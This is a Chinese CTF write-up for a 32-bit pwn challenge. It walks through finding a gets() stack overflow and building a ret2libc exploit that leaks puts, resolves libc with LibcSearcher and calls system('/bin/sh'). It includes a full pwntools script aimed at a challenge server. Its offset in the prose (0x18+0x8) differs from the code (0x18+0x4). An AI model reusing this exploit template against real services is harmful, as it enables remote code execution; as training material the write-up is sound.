首先checksec检查保护机制:
-32位程序
-开启了栈不可执行机制
然后使用反汇编工具IDA进行分析:
看到了vuln函数和左边的win1,win2函数及flag函数,第一眼看到就觉得能够从这些函数中获取flag,但实际行不行呢,先一个一个点进去看一下
vuln函数内部:
gets函数可触发栈溢出漏洞,顺便算出偏移为:0x18 + 0x8
win1函数内部;
使变量win1的值为1
win2函数内部:
一些if-else的条件选择语句
最后是flag函数内部:
可以发现要想从这里拿到flag,必须要让win1,win2和a1的值都等于-559039827,但是前面的那几个函数都无法实现,所以这几个函数一点作用也没有,纯糊弄人呢
由于在程序的反汇编代码中没有任何后门函数和system函数地址,题目也没给libc库文件,这里考虑泄露出某个函数的真实的地址再借助LibcSearcher这个插件找到libc库,再计算出libc基址,进而计算出system函数及/bin/sh的地址
先在IDA中拿到vuln函数的地址,方便后面二次使用栈溢出漏洞:0x8048714
然后就可以开始编写exp攻击脚本了:
第一次栈溢出先构造ROP链执行puts函数打印出puts函数的真实地址,拿到后通过LibcSearcher找到libc库,然后计算出libc基址后再计算出system函数和/bin/sh地址,第二次栈溢出执行system函数后就能拿到shell
from pwn import * from LibcSearcher import LibcSearcher context(arch='i386', os='linux', log_level='debug') #io = process('./pwn') # 在本地运行程序。 # gdb.attach(io) # 启动 GDB io = connect('node5.buuoj.cn',29484) # 与在线环境交互。 offset = 0x18 + 0x4 vuln_addr = 0x8048714 elf = ELF("./pwn") puts_got = elf.got['puts'] puts_plt = elf.plt['puts'] io.recvuntil(b'Enter your input> ') payload = b'a'*offset + p32(puts_plt) + p32(vuln_addr) + p32(puts_got) io.sendline(payload) puts_addr = u32(io.recv(4)) print(hex(puts_addr)) libc = LibcSearcher("puts",puts_addr) libc_base = puts_addr - libc.dump("puts") system_addr = libc_base + libc.dump("system") bin_sh_addr = libc_base + libc.dump("str_bin_sh") io.recvuntil(b'Enter your input> ') payload = b'a'*offset + p32(system_addr) + p32(1) + p32(bin_sh_addr) io.sendline(payload) io.interactive()这是运行结果:
这里要手动选择libc库,32位程序就选择32位的libc库就行,可能会选到不适配得到libc库,多试几个就行了
